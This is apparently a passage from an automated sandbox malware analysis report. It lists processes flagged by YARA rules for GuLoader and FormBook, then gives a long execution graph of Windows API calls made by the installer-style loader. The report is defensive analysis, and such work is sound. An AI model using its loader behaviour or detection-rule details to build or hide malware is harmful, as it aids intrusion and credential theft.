                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.136219856391.000000000258E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:01:57:41
                                                Start date:27/08/2024
                                                Path:C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe"
                                                Imagebase:0x550000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:5
                                                Start time:01:57:42
                                                Start date:27/08/2024
                                                Path:C:\Windows\SysWOW64\cmdkey.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\cmdkey.exe"
                                                Imagebase:0xad0000
                                                File size:17'408 bytes
                                                MD5 hash:6CDC8E5DF04752235D5B4432EACC81A8
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                Reputation:moderate
                                                Has exited:false

                                                General

                                                Target ID:6
                                                Start time:01:57:55
                                                Start date:27/08/2024
                                                Path:C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe"
                                                Imagebase:0x550000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:7
                                                Start time:01:58:09
                                                Start date:27/08/2024
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff7a7970000
                                                File size:597'432 bytes
                                                MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:24.5%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:15.6%
                                                  Total number of Nodes:806
                                                  Total number of Limit Nodes:29
                                                  execution_graph 3190 73ad2d6f 3191 73ad2d87 3190->3191 3192 73ad12d5 2 API calls 3191->3192 3193 73ad2da2 3192->3193 3194 404d44 3195 404d63 3194->3195 3196 404ee5 3194->3196 3195->3196 3197 404d6f 3195->3197 3198 404ef9 GetDlgItem GetDlgItem 3196->3198 3199 404f32 3196->3199 3201 404d74 SetWindowPos 3197->3201 3202 404d8e 3197->3202 3263 4052ca 3198->3263 3200 404f89 3199->3200 3209 401399 87 API calls 3199->3209 3204 404eb6 3200->3204 3205 405298 SendMessageA 3200->3205 3201->3204 3206 404de1 3202->3206 3207 404d93 ShowWindow 3202->3207 3231 404f9b 3205->3231 3211 404e03 3206->3211 3212 404de9 DestroyWindow 3206->3212 3207->3204 3210 404db8 GetWindowLongA 3207->3210 3208 404f1c SetClassLongA 3213 401533 87 API calls 3208->3213 3214 404f62 3209->3214 3210->3204 3215 404dd4 ShowWindow 3210->3215 3217 404e08 SetWindowLongA 3211->3217 3218 404e1b 3211->3218 3216 405218 3212->3216 3213->3199 3214->3200 3220 404f66 SendMessageA 3214->3220 3215->3204 3216->3204 3225 40524b ShowWindow 3216->3225 3217->3204 3218->3204 3219 404e27 GetDlgItem 3218->3219 3223 404e43 SendMessageA IsWindowEnabled 3219->3223 3224 404e62 3219->3224 3220->3204 3221 401533 87 API calls 3221->3231 3222 40521a DestroyWindow EndDialog 3222->3216 3223->3204 3223->3224 3227 404e75 3224->3227 3229 404eb8 SendMessageA 3224->3229 3230 404e87 3224->3230 3237 404e6d 3224->3237 3225->3204 3226 405c08 21 API calls 3226->3231 3227->3229 3227->3237 3229->3204 3232 404e90 3230->3232 3233 404e9e 3230->3233 3231->3204 3231->3221 3231->3222 3231->3226 3234 4052ca 22 API calls 3231->3234 3238 4052ca 22 API calls 3231->3238 3251 40515a DestroyWindow 3231->3251 3235 401533 87 API calls 3232->3235 3236 401533 87 API calls 3233->3236 3234->3231 3235->3237 3236->3237 3237->3204 3260 40569e 3237->3260 3239 40501f GetDlgItem 3238->3239 3240 405046 ShowWindow EnableWindow EnableWindow EnableWindow 3239->3240 3244 40503a 3239->3244 3240->3244 3241 40509b GetSystemMenu EnableMenuItem SendMessageA 3242 4050c8 SendMessageA 3241->3242 3241->3244 3242->3244 3244->3240 3244->3241 3245 405a46 22 API calls 3244->3245 3266 4052b3 SendMessageA 3244->3266 3267 4067cb lstrcpynA 3244->3267 3245->3244 3247 4050fa lstrlenA 3248 405c08 21 API calls 3247->3248 3249 405112 SetWindowTextA 3248->3249 3250 401399 87 API calls 3249->3250 3250->3231 3251->3216 3252 405174 CreateDialogParamA 3251->3252 3252->3216 3253 4051a7 3252->3253 3254 4052ca 22 API calls 3253->3254 3255 4051b2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3254->3255 3256 401399 87 API calls 3255->3256 3257 4051f8 3256->3257 3257->3204 3258 405200 ShowWindow 3257->3258 3259 405298 SendMessageA 3258->3259 3259->3216 3261 4056a5 3260->3261 3262 4056ab SendMessageA 3260->3262 3261->3262 3262->3204 3264 405c08 21 API calls 3263->3264 3265 4052d5 SetDlgItemTextA 3264->3265 3265->3208 3266->3244 3267->3247 3268 403424 3269 403433 SetTimer 3268->3269 3270 403447 3268->3270 3271 403450 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3269->3271 3270->3271 3272 40349e 3270->3272 3271->3272 3273 73ad1c2b 3275 73ad1c52 3273->3275 3274 73ad1cad 3277 73ad157e 2 API calls 3274->3277 3275->3274 3276 73ad1c8f GlobalFree 3275->3276 3276->3274 3278 73ad1d41 GlobalFree GlobalFree 3277->3278 3299 73ad1a24 3300 73ad1504 GlobalFree 3299->3300 3302 73ad1a3c 3300->3302 3301 73ad1a7e GlobalFree 3302->3301 3303 73ad1a5a 3302->3303 3304 73ad1a6a VirtualFree 3302->3304 3303->3301 3304->3301 3305 73ad2b24 3306 73ad2b8b 3305->3306 3307 73ad2b76 3305->3307 3307->3306 3308 73ad2b80 GetLastError 3307->3308 3308->3306 2413 73ad19c7 2414 73ad1a1e 2413->2414 2415 73ad19d7 VirtualProtect 2413->2415 2415->2414 3309 73ad1a87 3310 73ad1ab5 3309->3310 3311 73ad2288 18 API calls 3310->3311 3312 73ad1abc 3311->3312 3313 73ad1acf 3312->3313 3314 73ad1ac3 3312->3314 3316 73ad1ad9 3313->3316 3317 73ad1af0 3313->3317 3315 73ad157e 2 API calls 3314->3315 3320 73ad1acd 3315->3320 3321 73ad1558 3 API calls 3316->3321 3318 73ad1b1c 3317->3318 3319 73ad1af6 3317->3319 3323 73ad1558 3 API calls 3318->3323 3322 73ad15f4 3 API calls 3319->3322 3324 73ad1ade 3321->3324 3325 73ad1afb 3322->3325 3323->3320 3326 73ad15f4 3 API calls 3324->3326 3327 73ad157e 2 API calls 3325->3327 3328 73ad1ae4 3326->3328 3329 73ad1b01 GlobalFree 3327->3329 3330 73ad157e 2 API calls 3328->3330 3329->3320 3331 73ad1aea GlobalFree 3329->3331 3330->3331 2416 73ad1606 2417 73ad1637 2416->2417 2458 73ad2288 2417->2458 2419 73ad163e 2420 73ad176f 2419->2420 2421 73ad164f 2419->2421 2422 73ad1656 2419->2422 2505 73ad1edd 2421->2505 2489 73ad1f58 2422->2489 2427 73ad1680 2428 73ad16c0 2427->2428 2429 73ad16a2 2427->2429 2432 73ad16c6 2428->2432 2433 73ad1711 2428->2433 2518 73ad2128 2429->2518 2430 73ad166b 2440 73ad1675 2430->2440 2441 73ad1682 2430->2441 2431 73ad168a 2431->2427 2515 73ad2e4f 2431->2515 2537 73ad1e71 2432->2537 2438 73ad2128 11 API calls 2433->2438 2444 73ad16fe 2438->2444 2439 73ad16a8 2529 73ad15f4 2439->2529 2440->2427 2499 73ad2bc4 2440->2499 2509 73ad1774 2441->2509 2450 73ad175e 2444->2450 2542 73ad1f1f 2444->2542 2446 73ad1688 2446->2427 2447 73ad2128 11 API calls 2447->2444 2450->2420 2452 73ad1768 GlobalFree 2450->2452 2452->2420 2455 73ad174f 2455->2450 2546 73ad1558 wsprintfA 2455->2546 2456 73ad1742 FreeLibrary 2456->2455 2549 73ad12c6 GlobalAlloc 2458->2549 2460 73ad22b4 2550 73ad12c6 GlobalAlloc 2460->2550 2462 73ad28f7 GlobalFree GlobalFree GlobalFree 2463 73ad2917 2462->2463 2477 73ad2965 2462->2477 2465 73ad29b5 2463->2465 2473 73ad2930 2463->2473 2463->2477 2464 73ad2814 GlobalAlloc 2481 73ad22bf 2464->2481 2466 73ad29d6 GetModuleHandleA 2465->2466 2465->2477 2469 73ad29fc 2466->2469 2470 73ad29e7 LoadLibraryA 2466->2470 2467 73ad2866 lstrcpyA 2471 73ad2871 lstrcpyA 2467->2471 2468 73ad2884 GlobalFree 2468->2481 2557 73ad1ece GetProcAddress 2469->2557 2470->2469 2470->2477 2471->2481 2475 73ad12af 2 API calls 2473->2475 2473->2477 2474 73ad2a48 2476 73ad2a56 lstrlenA 2474->2476 2474->2477 2475->2477 2558 73ad1ece GetProcAddress 2476->2558 2477->2419 2479 73ad2a09 2479->2474 2488 73ad2a32 GetProcAddress 2479->2488 2481->2462 2481->2464 2481->2467 2481->2468 2481->2471 2482 73ad28c2 2481->2482 2483 73ad2718 GlobalFree 2481->2483 2487 73ad27b8 lstrcpyA 2481->2487 2551 73ad12c6 GlobalAlloc 2481->2551 2552 73ad12af 2481->2552 2482->2481 2555 73ad12d5 GlobalSize GlobalAlloc 2482->2555 2483->2481 2484 73ad2a70 2484->2477 2487->2481 2488->2474 2496 73ad1f6d 2489->2496 2491 73ad20dc GlobalFree 2492 73ad165c 2491->2492 2491->2496 2492->2427 2492->2430 2492->2431 2493 73ad2038 GlobalAlloc MultiByteToWideChar 2495 73ad2067 GlobalAlloc CLSIDFromString GlobalFree 2493->2495 2498 73ad1f9a 2493->2498 2494 73ad12af lstrcpynA GlobalAlloc 2494->2496 2495->2491 2496->2491 2496->2493 2496->2494 2496->2498 2498->2491 2498->2496 2560 73ad14e2 2498->2560 2565 73ad1958 2498->2565 2501 73ad2bd6 2499->2501 2500 73ad2c7b VirtualAllocEx 2504 73ad2c99 2500->2504 2501->2500 2568 73ad2b72 2504->2568 2506 73ad1ef0 2505->2506 2507 73ad1efb GlobalAlloc 2506->2507 2508 73ad1655 2506->2508 2507->2506 2508->2422 2513 73ad17a0 2509->2513 2510 73ad1825 2512 73ad1829 GlobalSize 2510->2512 2514 73ad1832 2510->2514 2511 73ad1814 GlobalAlloc 2511->2514 2512->2514 2513->2510 2513->2511 2514->2446 2516 73ad2e5a 2515->2516 2517 73ad2e9a GlobalFree 2516->2517 2571 73ad12c6 GlobalAlloc 2518->2571 2520 73ad219f lstrcpynA 2527 73ad2136 2520->2527 2521 73ad21d8 WideCharToMultiByte 2521->2527 2522 73ad21b0 StringFromGUID2 WideCharToMultiByte 2522->2527 2523 73ad2202 wsprintfA 2523->2527 2524 73ad2225 GlobalFree 2524->2527 2525 73ad225c GlobalFree 2525->2439 2526 73ad157e 2 API calls 2526->2527 2527->2520 2527->2521 2527->2522 2527->2523 2527->2524 2527->2525 2527->2526 2572 73ad15c7 2527->2572 2576 73ad12c6 GlobalAlloc 2529->2576 2531 73ad15f9 2532 73ad1e71 2 API calls 2531->2532 2533 73ad1603 2532->2533 2534 73ad157e 2533->2534 2535 73ad1587 GlobalAlloc lstrcpynA 2534->2535 2536 73ad15c2 GlobalFree 2534->2536 2535->2536 2536->2444 2538 73ad1eaf lstrcpyA 2537->2538 2539 73ad1e7e wsprintfA 2537->2539 2541 73ad16e5 2538->2541 2539->2541 2541->2447 2543 73ad1f2e 2542->2543 2544 73ad1724 2542->2544 2543->2544 2545 73ad1f42 GlobalFree 2543->2545 2544->2455 2544->2456 2545->2543 2547 73ad157e 2 API calls 2546->2547 2548 73ad1579 2547->2548 2548->2450 2549->2460 2550->2481 2551->2481 2559 73ad12c6 GlobalAlloc 2552->2559 2554 73ad12be lstrcpynA 2554->2481 2556 73ad12f3 2555->2556 2556->2482 2557->2479 2558->2484 2559->2554 2561 73ad14ef 2560->2561 2562 73ad12c6 GlobalAlloc 2560->2562 2563 73ad12af 2 API calls 2561->2563 2562->2498 2564 73ad1502 2563->2564 2564->2498 2566 73ad19c5 2565->2566 2567 73ad1967 VirtualAlloc 2565->2567 2566->2498 2567->2566 2569 73ad2b8b 2568->2569 2570 73ad2b80 GetLastError 2568->2570 2569->2427 2570->2569 2571->2527 2573 73ad15ef 2572->2573 2574 73ad15ce 2572->2574 2573->2527 2574->2573 2575 73ad15d7 lstrcpyA 2574->2575 2575->2573 2576->2531 3333 73ad10c6 3335 73ad10f7 3333->3335 3334 73ad12a7 GlobalFree 3335->3334 3336 73ad1245 GlobalFree 3335->3336 3337 73ad11d5 GlobalAlloc 3335->3337 3338 73ad12a3 3335->3338 3339 73ad14e2 3 API calls 3335->3339 3340 73ad1286 GlobalFree 3335->3340 3341 73ad157e 2 API calls 3335->3341 3343 73ad115d GlobalAlloc 3335->3343 3344 73ad15c7 lstrcpyA 3335->3344 3336->3335 3337->3335 3338->3334 3339->3335 3340->3335 3342 73ad11ca GlobalFree 3341->3342 3342->3335 3343->3335 3345 73ad11ad GlobalFree 3344->3345 3345->3335 3346 73ad1000 3349 73ad101b 3346->3349 3350 73ad1504 GlobalFree 3349->3350 3351 73ad1020 3350->3351 3352 73ad1024 GlobalAlloc 3351->3352 3353 73ad1032 3351->3353 3352->3353 3354 73ad1558 3 API calls 3353->3354 3355 73ad1019 3354->3355 2577 4034ce SetErrorMode GetVersionExA 2578 403519 GetVersionExA 2577->2578 2580 403558 2577->2580 2579 403531 2578->2579 2578->2580 2579->2580 2581 4035e7 2580->2581 2582 4065a6 5 API calls 2580->2582 2667 405f0b GetSystemDirectoryA 2581->2667 2582->2581 2584 4035fd lstrlenA 2584->2581 2585 40360b 2584->2585 2670 4065a6 GetModuleHandleA 2585->2670 2588 4065a6 5 API calls 2589 403619 2588->2589 2590 4065a6 5 API calls 2589->2590 2591 403625 #17 OleInitialize SHGetFileInfoA 2590->2591 2676 4067cb lstrcpynA 2591->2676 2594 403673 GetCommandLineA 2677 4067cb lstrcpynA 2594->2677 2596 403685 2678 4062a5 2596->2678 2599 403760 GetTempPathA 2682 403a98 2599->2682 2601 403777 2602 4037e6 DeleteFileA 2601->2602 2603 40377b GetWindowsDirectoryA lstrcatA 2601->2603 2692 4031c2 GetTickCount GetModuleFileNameA 2602->2692 2604 403a98 12 API calls 2603->2604 2606 40379f 2604->2606 2606->2602 2610 4037a3 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 2606->2610 2607 4062a5 CharNextA 2609 4036ca 2607->2609 2608 4037f7 2611 403867 2608->2611 2614 403859 2608->2614 2620 4062a5 CharNextA 2608->2620 2609->2607 2612 40374a 2609->2612 2617 403748 2609->2617 2613 403a98 12 API calls 2610->2613 2872 4034a4 2611->2872 2806 4067cb lstrcpynA 2612->2806 2616 4037de 2613->2616 2720 405784 2614->2720 2616->2602 2616->2611 2617->2599 2622 403815 2620->2622 2630 40386e 2622->2630 2631 40382f 2622->2631 2623 4039f6 2626 403a03 GetCurrentProcess OpenProcessToken 2623->2626 2627 4039d1 ExitProcess 2623->2627 2624 4039c6 2879 406759 2624->2879 2628 403a52 2626->2628 2629 403a1b LookupPrivilegeValueA AdjustTokenPrivileges 2626->2629 2633 4065a6 5 API calls 2628->2633 2629->2628 2778 4061ad 2630->2778 2807 4062e2 2631->2807 2636 403a59 2633->2636 2640 403a70 ExitWindowsEx 2636->2640 2643 403a7d 2636->2643 2640->2627 2640->2643 2641 40388e 2663 4038a6 2641->2663 2823 4067cb lstrcpynA 2641->2823 2883 401533 2643->2883 2644 40384e 2822 4067cb lstrcpynA 2644->2822 2648 4038b8 wsprintfA 2782 405c08 2648->2782 2650 4038e9 2653 4038dd 2650->2653 2824 405bad CreateDirectoryA 2650->2824 2653->2650 2654 403942 SetCurrentDirectoryA 2653->2654 2655 4038f9 GetFileAttributesA 2653->2655 2827 405b8d CreateDirectoryA 2653->2827 2799 405fa6 MoveFileExA 2654->2799 2656 403922 2655->2656 2657 40390f DeleteFileA 2655->2657 2656->2611 2656->2663 2830 4063be 2656->2830 2657->2656 2661 405fa6 39 API calls 2661->2663 2662 405c08 21 API calls 2662->2663 2663->2611 2663->2648 2663->2661 2663->2662 2665 4039e9 CloseHandle 2663->2665 2803 40637b CreateProcessA 2663->2803 2869 40627e FindFirstFileA 2663->2869 2665->2611 2668 405f2d wsprintfA LoadLibraryExA 2667->2668 2668->2584 2671 4065c8 GetProcAddress 2670->2671 2672 4065be 2670->2672 2674 403612 2671->2674 2673 405f0b 3 API calls 2672->2673 2675 4065c4 2673->2675 2674->2588 2675->2671 2675->2674 2676->2594 2677->2596 2679 4036b1 CharNextA 2678->2679 2680 4062af 2678->2680 2679->2599 2679->2609 2680->2679 2681 4062b8 CharNextA 2680->2681 2681->2679 2681->2680 2886 4069ae 2682->2886 2684 403aa4 2685 403aae 2684->2685 2895 406207 lstrlenA CharPrevA 2684->2895 2685->2601 2688 405b8d 2 API calls 2689 403abc 2688->2689 2898 406712 2689->2898 2902 4065db GetFileAttributesA CreateFileA 2692->2902 2694 403204 2711 403211 2694->2711 2903 4067cb lstrcpynA 2694->2903 2696 403227 2904 406983 lstrlenA 2696->2904 2700 403238 GetFileSize 2701 403251 2700->2701 2717 40333f 2700->2717 2706 40340d 2701->2706 2701->2711 2714 40315e 6 API calls 2701->2714 2701->2717 2944 402f2a 2701->2944 2703 40334e 2705 40338f GlobalAlloc 2703->2705 2703->2711 2920 402f40 SetFilePointer 2703->2920 2923 402f40 SetFilePointer 2705->2923 2708 40315e 6 API calls 2706->2708 2708->2711 2710 40336b 2921 406608 ReadFile 2710->2921 2711->2608 2712 4033ac 2924 402f57 2712->2924 2714->2701 2909 40315e 2717->2909 2718 4033bb 2718->2711 2718->2718 2719 4033eb SetFilePointer 2718->2719 2719->2711 2721 4065a6 5 API calls 2720->2721 2722 405798 2721->2722 2723 4057b0 2722->2723 2724 40579e 2722->2724 2974 406637 2723->2974 2973 4062c9 wsprintfA 2724->2973 2728 4057f4 lstrcatA 2729 4057ae 2728->2729 2965 4056c5 2729->2965 2730 406637 3 API calls 2730->2728 2733 4062e2 18 API calls 2734 405826 2733->2734 2735 4058b2 2734->2735 2737 406637 3 API calls 2734->2737 2736 4062e2 18 API calls 2735->2736 2738 4058b8 2736->2738 2739 405854 2737->2739 2740 4058c8 LoadImageA 2738->2740 2741 405c08 21 API calls 2738->2741 2739->2735 2744 405870 lstrlenA 2739->2744 2748 4062a5 CharNextA 2739->2748 2742 405975 2740->2742 2743 4058f8 RegisterClassA 2740->2743 2741->2740 2747 401533 87 API calls 2742->2747 2745 405925 2743->2745 2746 40592c SystemParametersInfoA CreateWindowExA 2743->2746 2749 4058a5 2744->2749 2750 40587f lstrcmpiA 2744->2750 2745->2611 2746->2742 2751 40597b 2747->2751 2753 40586e 2748->2753 2752 406207 3 API calls 2749->2752 2750->2749 2754 40588f GetFileAttributesA 2750->2754 2751->2745 2755 4056c5 22 API calls 2751->2755 2756 4058ab 2752->2756 2753->2744 2757 40589b 2754->2757 2758 405988 2755->2758 2979 4067cb lstrcpynA 2756->2979 2757->2749 2760 406983 2 API calls 2757->2760 2761 405994 ShowWindow 2758->2761 2762 405a16 2758->2762 2760->2749 2764 405f0b 3 API calls 2761->2764 2980 4055aa OleInitialize 2762->2980 2766 4059ac 2764->2766 2765 405a1c 2767 405a20 2765->2767 2768 405a3a 2765->2768 2769 4059ba GetClassInfoA 2766->2769 2770 405f0b 3 API calls 2766->2770 2767->2745 2774 401533 87 API calls 2767->2774 2771 401533 87 API calls 2768->2771 2772 4059e3 DialogBoxParamA 2769->2772 2773 4059cd GetClassInfoA RegisterClassA 2769->2773 2770->2769 2775 405a41 2771->2775 2776 401533 87 API calls 2772->2776 2773->2772 2774->2745 2775->2775 2777 405a0b 2776->2777 2777->2745 2779 4065a6 5 API calls 2778->2779 2780 403873 lstrlenA 2779->2780 2781 4067cb lstrcpynA 2780->2781 2781->2641 2797 405c13 2782->2797 2783 405e6d 2784 405e81 2783->2784 3141 4067cb lstrcpynA 2783->3141 2784->2653 2786 405e3c lstrlenA 2786->2797 2788 405c08 15 API calls 2788->2786 2790 405d37 GetSystemDirectoryA 2790->2797 2791 406637 3 API calls 2791->2797 2792 405d4d GetWindowsDirectoryA 2792->2797 2793 4069ae CharNextA CharNextA CharNextA CharNextA CharPrevA 2793->2797 2794 405c08 15 API calls 2794->2797 2795 405ddd lstrcatA 2795->2797 2796 4065a6 5 API calls 2796->2797 2797->2783 2797->2786 2797->2788 2797->2790 2797->2791 2797->2792 2797->2793 2797->2794 2797->2795 2797->2796 2798 405daf SHGetPathFromIDListA CoTaskMemFree 2797->2798 3139 4062c9 wsprintfA 2797->3139 3140 4067cb lstrcpynA 2797->3140 2798->2797 2800 403959 CopyFileA 2799->2800 2801 405fba 2799->2801 2800->2611 2800->2663 3142 406039 2801->3142 2804 4063ba 2803->2804 2805 4063ae CloseHandle 2803->2805 2804->2663 2805->2804 2806->2617 3175 4067cb lstrcpynA 2807->3175 2809 4062f3 2810 406876 4 API calls 2809->2810 2811 4062f9 2810->2811 2812 4069ae 5 API calls 2811->2812 2813 40383b 2811->2813 2819 406305 2812->2819 2813->2611 2821 4067cb lstrcpynA 2813->2821 2814 406330 lstrlenA 2815 40633c 2814->2815 2814->2819 2816 406207 3 API calls 2815->2816 2818 406341 GetFileAttributesA 2816->2818 2817 40627e 2 API calls 2817->2819 2818->2813 2819->2813 2819->2814 2819->2817 2820 406983 2 API calls 2819->2820 2820->2814 2821->2644 2822->2614 2823->2663 2825 405c01 2824->2825 2826 405bf9 GetLastError 2824->2826 2825->2650 2826->2825 2828 405ba7 2827->2828 2829 405b9f GetLastError 2827->2829 2828->2653 2829->2828 2831 4062e2 18 API calls 2830->2831 2832 4063e0 2831->2832 2833 406400 2832->2833 2834 4063e9 DeleteFileA 2832->2834 2835 406589 2833->2835 2848 406541 2833->2848 3176 4067cb lstrcpynA 2833->3176 2834->2835 2835->2656 2837 406428 2838 406440 2837->2838 2839 406432 lstrcatA 2837->2839 2842 406983 2 API calls 2838->2842 2841 406446 2839->2841 2840 40627e 2 API calls 2843 406559 2840->2843 2844 406454 lstrcatA 2841->2844 2846 40645c lstrlenA FindFirstFileA 2841->2846 2842->2841 2843->2835 2845 40655d 2843->2845 2844->2846 2847 406207 3 API calls 2845->2847 2846->2848 2858 406487 2846->2858 2849 406563 2847->2849 2848->2835 2848->2840 2851 406234 5 API calls 2849->2851 2850 4062a5 CharNextA 2850->2858 2852 40656f 2851->2852 2853 406591 2852->2853 2854 406573 2852->2854 2855 405a65 28 API calls 2853->2855 2854->2835 2857 405a65 28 API calls 2854->2857 2855->2835 2859 40657f 2857->2859 2858->2850 2860 406520 FindNextFileA 2858->2860 2867 4064e0 2858->2867 3177 4067cb lstrcpynA 2858->3177 2861 405fa6 39 API calls 2859->2861 2860->2858 2862 406537 FindClose 2860->2862 2863 406587 2861->2863 2862->2848 2863->2835 2865 4063be 63 API calls 2865->2867 2866 405a65 28 API calls 2866->2867 2867->2860 2867->2865 2867->2866 2868 405fa6 39 API calls 2867->2868 3178 406234 2867->3178 2868->2867 2870 406294 FindClose 2869->2870 2871 40629f 2869->2871 2870->2871 2871->2663 2873 4034bc 2872->2873 2874 4034ae CloseHandle 2872->2874 3186 403b06 2873->3186 2874->2873 2877 4063be 70 API calls 2878 4034cd OleUninitialize 2877->2878 2878->2623 2878->2624 2880 40676e 2879->2880 2881 4067bc 2880->2881 2882 406784 MessageBoxIndirectA 2880->2882 2881->2627 2882->2881 2884 401399 87 API calls 2883->2884 2885 401547 2884->2885 2885->2627 2893 4069be 2886->2893 2887 406a3c CharPrevA 2890 406a35 2887->2890 2888 406a26 CharNextA 2888->2890 2888->2893 2889 4062a5 CharNextA 2889->2893 2890->2887 2891 406a57 2890->2891 2891->2684 2892 406a14 CharNextA 2892->2893 2893->2888 2893->2889 2893->2890 2893->2892 2894 406a21 CharNextA 2893->2894 2894->2888 2896 406222 lstrcatA 2895->2896 2897 403ab6 2895->2897 2896->2897 2897->2688 2899 40671d GetTickCount GetTempFileNameA 2898->2899 2900 403ac7 2899->2900 2901 406749 2899->2901 2900->2601 2901->2899 2901->2900 2902->2694 2903->2696 2905 406991 2904->2905 2906 406996 CharPrevA 2905->2906 2907 40322d 2905->2907 2906->2905 2906->2907 2908 4067cb lstrcpynA 2907->2908 2908->2700 2910 403165 2909->2910 2911 40317d 2909->2911 2912 403175 2910->2912 2913 40316e DestroyWindow 2910->2913 2914 403186 2911->2914 2915 40318e GetTickCount 2911->2915 2912->2703 2913->2912 2947 405f78 2914->2947 2917 4031c1 2915->2917 2918 40319c CreateDialogParamA ShowWindow 2915->2918 2917->2703 2918->2917 2920->2710 2922 40337d 2921->2922 2922->2705 2922->2711 2923->2712 2925 402f93 2924->2925 2926 402f86 2924->2926 2928 406608 ReadFile 2925->2928 2953 402f40 SetFilePointer 2926->2953 2929 402fa5 2928->2929 2930 4030e7 2929->2930 2931 4030f9 2929->2931 2932 402fb9 GetTickCount 2929->2932 2930->2718 2933 40313d 2931->2933 2938 4030fd 2931->2938 2932->2930 2934 402fe9 2932->2934 2935 402f2a ReadFile 2933->2935 2934->2930 2936 402f2a ReadFile 2934->2936 2940 403040 GetTickCount 2934->2940 2941 403071 MulDiv wsprintfA 2934->2941 2951 4066c7 WriteFile 2934->2951 2935->2930 2936->2934 2937 402f2a ReadFile 2937->2938 2938->2930 2938->2937 2939 4066c7 WriteFile 2938->2939 2939->2938 2940->2934 2954 405a65 2941->2954 2945 406608 ReadFile 2944->2945 2946 402f3d 2945->2946 2946->2701 2948 405f8a PeekMessageA 2947->2948 2949 405f80 DispatchMessageA 2948->2949 2950 40318d 2948->2950 2949->2948 2950->2703 2952 4066e8 2951->2952 2952->2934 2953->2925 2955 405a77 2954->2955 2963 405b35 2954->2963 2956 405a98 lstrlenA 2955->2956 2957 405c08 21 API calls 2955->2957 2958 405aa9 lstrlenA 2956->2958 2959 405aca 2956->2959 2957->2956 2960 405abc lstrcatA 2958->2960 2958->2963 2961 405ad7 SetWindowTextA 2959->2961 2962 405ae8 2959->2962 2960->2959 2961->2962 2962->2963 2964 405aec SendMessageA SendMessageA SendMessageA 2962->2964 2963->2934 2964->2963 2966 4056d8 2965->2966 2987 4062c9 wsprintfA 2966->2987 2968 405751 2988 405a46 2968->2988 2970 40577f 2970->2733 2971 405756 2971->2970 2972 405c08 21 API calls 2971->2972 2972->2971 2973->2729 2991 40600b 2974->2991 2977 4057d6 2977->2728 2977->2730 2978 40666c RegQueryValueExA RegCloseKey 2978->2977 2979->2735 2995 405298 2980->2995 2982 4055f4 2983 405298 SendMessageA 2982->2983 2985 405606 OleUninitialize 2983->2985 2984 4055cd 